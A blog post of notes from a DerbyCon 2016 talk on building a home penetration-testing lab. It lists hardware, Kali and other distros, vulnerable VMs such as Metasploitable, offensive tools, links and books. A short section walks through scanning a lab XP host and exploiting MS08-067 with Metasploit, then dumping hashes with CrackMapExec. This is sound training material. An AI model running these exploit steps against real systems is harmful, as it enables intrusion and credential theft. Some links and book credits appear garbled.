Notes on how to create a Penetration Testing Lab
I’ve always had an interest in penetration testing and have messed around with nmap and nessus, but now I’m going to dig in my heels and become proficient using the tools in the pen-test theater. The following post is more of an outline of what is found in a youtube video I found here at Derbycon 2016. This speaker was inspiring as well as a few others who’ve spoken because they said that Sysadmins make good penetration testers. They mentioned that someone who is good at building systems and networks in general do well at breaking them down and actively locating and fixing problems in other systems. I am not looking to become a script kiddy, or a black hat/dark side cracker for that matter, but I do hope to become proficient with the tools they use, as well as work with python to build my own tools.
Since I last upgraded my vm server to proxmox, I’ve been kicking around ideas on how to use the hardware to it’s fullest potential. I’ve already gotten started by by first creating a new network on my proxmox host, and started up my first server in my segrated ‘insecure’ network by spinning up an isc-dhcp-server. I’ll probably post info on my build as I go along so stay tuned.
-Start of Video notes-
Credit: David Boyd
Pentest lab requirements:
- Core i5 CPU
- 16gb RAM
- 250-500GB HDD
- 7zip
VM software:
- virtualbox
- VMWare
- Hyper-V
- (I’ll be using) ProxMox
Pentesting platforms:
- Kali Linux
- Samurai WTF (WebAppTesting)
- SamuraiSTFU(Utility Hacking)
- Deft Linux (Forensics)
Old stuff:
- olpix (?)
- IWax(?)
- backtrack (now Kali)
Offensive Security has – pre-compiled linux distro
Note: generate your own SSH keys
Now need something to attack…
Vulnerable VM’s:
- Metasploitable 2 (Metasploit) – intentionally vulnerable Ubuntu has remote logins, backdoors, default pwds, vulnerable web services
- Morning Catch (Phishing)
- OWASP BrokenWebApplications (WebApps)
WebGoat (Web Applications) - vulnhub.com (challengeVMs)
- Kioptrix (Beginners)
- PwnOS
Guides to pen expoits:
https://community.rapid7.com/docs/DOC-1875
Introducing Morning Catch
http://blog.cobaltstrike.com/2014/08/06/introducing-morning-catch-a-phishing-paradise/ – real working phishing lab
Sans Mutillidae Whitepaper
https://www.sans.org/reading-room/whitepapers/testing/introduction-owasp-mutillidae-ii-web-pen-test-training-environment-34380
VM’s to build and test:
- Windows XP
- Windows Server
- MS Exchange
- Windows 7
- Build your own domainDownload evaluations, take snapshots and revert if they expire
- Technet Evaluation Center
Server 2012: https://www.microsoft.com/en-US/evalcenter/evaluate-windows-server-2012 - Win7/8/10
https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/
Do not expose vulnerable vm’s to internet!
Make them hosts only (or in proxmox create a new bridge)
More tools:
- nmap
- nessus
- cain (still works)
- responder
- john the ripper/hashcat
- metasploit (freeversion works great)
- SET/GoPhish/SPF (social engineering)
- Discover Scripts – great stuff – great reconnisance
- PowershellEmpire
- CrackMapExec (post exploit)
How to Build a test domain controller, and add users with various privileges:
http://thehackerplaybook.com/windows-domain.htm
Once the virtual machines have been setup and set to ‘host only’
ping each vm
Initial testing and exploit example:
On Kali:
nmap 192.168.110.2 (XP)
nmap -O 192.168.110.2 (checks for OS)
msfconsole
msf> search ms08-067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
(shows mudule options)
msf exploit(ms08_067_netapi) > set RHOST 192.168.110.2
msf exploit(ms08_067_netapi) > exploit
kali:`# crackmapexec
(dumps hashes)
phishing server – load up goPhish – setup add users, make campaign
Additional training:
Metasploit unleashed
https://www.offensive-security.com/metasploit-unleashed
Hack This Site!
https://www.hackthissite.org/reading-room/whitepapers/testing/introduction-owasp-mutillidae-ii-web-pen-test-training-environment-34380
Youtube videos:
Derbycon, BSides, DefCon, ISSA
More information: Sans Cyber Aces, InfoSec Institute, Cybrary
It’s wise to find a mentor, as well as do some mentoring
Recommended reading (actual paper books):
- The hacker playbook
- Penetration Testing – a hands-on introduction to hacking – george wymann
- Metasploit – The Penetration Tester’s Guide
- Hacking – The art of exploitation Erickson
- Professional Penetration Testing
- The Art of Intrusion – kevin mitnick
- The art of deception – kevin mitnick
- Ghost in the wires – kevin mitnick
- Black Hat Python – Jason Street